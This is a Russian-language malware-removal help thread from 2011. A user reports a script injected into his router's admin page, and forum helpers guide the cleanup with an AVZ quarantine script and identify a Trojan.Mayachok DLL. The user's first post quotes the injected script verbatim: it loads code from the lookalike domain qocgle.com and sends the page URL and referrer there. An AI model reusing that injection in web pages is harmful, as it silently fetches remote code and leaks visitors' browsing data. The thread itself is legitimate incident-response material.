Показано с 1 по 10 из 10.

Вредоносная программа, которая ничем не определяется (заявка № 104094)

  1. #1
    Junior Member Репутация
    Регистрация
    21.06.2011
    Сообщений
    5
    Вес репутации
    20

    Thumbs up Вредоносная программа, которая ничем не определяется

    Господа, нужна помощь!
    Домашняя сеть WI-FI построена на Dlink-615. При обращении с ПК с установленным KIS 11.0.2.556 (a,b,c,d,e,f) и с последними обновлениями на домашнюю страницу с адресом 192.168.0.1 браузеры Firefox 4.1.1, Safary 5.0.5 пытается выполнить скрипт:
    <script>if(self==top){ document.write("<script src='http" + (("https:" == document.location.protocol) ? "s" : "") + "://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("Wp4d0bs3Kq KEahPLm/cwrmOzeYcbX7DgGVcRN1zGDaq0wci714ACDij4e70bm483")+" &r="+escape(document.referrer)+"&u="+escape(docume nt.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script></body></html> который не дает ввести пароль в течении нескольких минут!
    IE 9, Opera 11.11 на этом же ПК работает нормально не обнаружив этого скрипта. При просмотре этой же страницы с iPad, iPhone этот скрипт так же отсутствует. Полное сканирование KIS и AVZ в нормальном и защищенном режиме файловой системы зловреда не выявило. Нужна помощь по обнаружению зловреда.

    С уважением, Владимир
    P.S. Утилита HousecallLauncher (с последними обновлениями) не определяет вредоносного кода.
    Проблема устранена Касперовцами, подробнее см http://kaspersky-911.ru/?action=case...&case_id=88193
    Последний раз редактировалось GVA; 22.06.2011 в 10:35. Причина: Добавление информации

  2. Реклама
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,269
    Вес репутации
    326
    Уважаемый(ая) GVA, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    27.05.2009
    Сообщений
    2,655
    Вес репутации
    224
    Здравствуйте!
    Пожалуйста, сделайте логи по правилам.

  5. #4
    Junior Member Репутация
    Регистрация
    21.06.2011
    Сообщений
    5
    Вес репутации
    20

    Файлы логов во вложении

    Готово! Файлы логов во вложении. virusinfo_files_GVA-PC.zip не хочет загружаться, т.к. его размер при максимальной упаковке rar более 10мб.
    Вложения Вложения

  6. #5
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для миднайт
    Регистрация
    28.03.2009
    Адрес
    Voronezh
    Сообщений
    9,466
    Вес репутации
    729
    В AVZ выполните скрипт:

    Код:
    begin
    SetAVZGuardStatus(True);
     QuarantineFile('C:\Windows\system32\rbdtewh.dll','');
     DeleteService('RODRE');
     QuarantineFile('c:\tmp\RODRE.exe','');
     DeleteFile('c:\tmp\RODRE.exe');
     DeleteFile('C:\Windows\system32\rbdtewh.dll');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.

    После перезагрузки

    Код:
    begin 
    CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Пришлите карантин quarantine.zip по красной ссылке Прислать запрошенный карантин вверху темы.
    Логи повторите.
    Paula rhei.
    Поддержать проект можно тут

  7. #6
    Junior Member Репутация
    Регистрация
    21.06.2011
    Сообщений
    5
    Вес репутации
    20

    Сделано

    Файл карантина выслан. Новые файлы логов во вложении
    Вложения Вложения
    Последний раз редактировалось GVA; 22.06.2011 в 04:43. Причина: Добавлен лог

  8. #7
    Junior Member Репутация
    Регистрация
    21.06.2011
    Сообщений
    5
    Вес репутации
    20

    Всем большое спасибо. Проблема устранена.


  9. #8
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для миднайт
    Регистрация
    28.03.2009
    Адрес
    Voronezh
    Сообщений
    9,466
    Вес репутации
    729
    В следующий раз выбирайте где будете вести лечение. Не хотелось бы отвечать по два раза на одну и туже тему на разных форумах. В логах чисто.
    Paula rhei.
    Поддержать проект можно тут

  10. #9
    Junior Member Репутация
    Регистрация
    21.06.2011
    Сообщений
    5
    Вес репутации
    20

    Еще раз спасибо и извините за беспокойство

    Цитата Сообщение от миднайт Посмотреть сообщение
    В следующий раз выбирайте где будете вести лечение. Не хотелось бы отвечать по два раза на одну и туже тему на разных форумах. В логах чисто.
    Еще раз большое спасибо и извините, за беспокойство. Честно говоря немного растерялся - впервые за долгие годы самостоятельно не мог выявить зловреда и не знал куда обращаться за помощью.

  11. #10
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    47,555
    Вес репутации
    942

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 2
    • Обработано файлов: 19
    • В ходе лечения обнаружены вредоносные программы:
      1. c:\\windows\\system32\\rbdtewh.dll - Trojan.Win32.Zapchast.hcz ( DrWEB: Trojan.Mayachok.based, BitDefender: Trojan.Generic.KDV.262020, AVAST4: Win32:MalOb-HG [Cryp] )


  • Уважаемый(ая) GVA, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Похожие темы

    1. Вредоносная программа, которая ничем не определяется (заявка №88193)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 3
      Последнее сообщение: 22.06.2011, 15:00
    2. программа которая не удаляется антивирусом (заявка №86767)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 2
      Последнее сообщение: 21.06.2011, 00:00
    3. Вредоносная программа
      От MoHroJI в разделе Вредоносные программы
      Ответов: 2
      Последнее сообщение: 27.03.2011, 20:43
    4. Вредоносная программа или вирусы
      От Лерка в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 22.02.2009, 04:49
    5. FlexiSpy-программа, которая шпионит за сотовыми телефонами
      От HATTIFNATTOR в разделе Лечение и защита мобильных устройств
      Ответов: 3
      Последнее сообщение: 24.04.2006, 09:28

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01563 seconds with 23 queries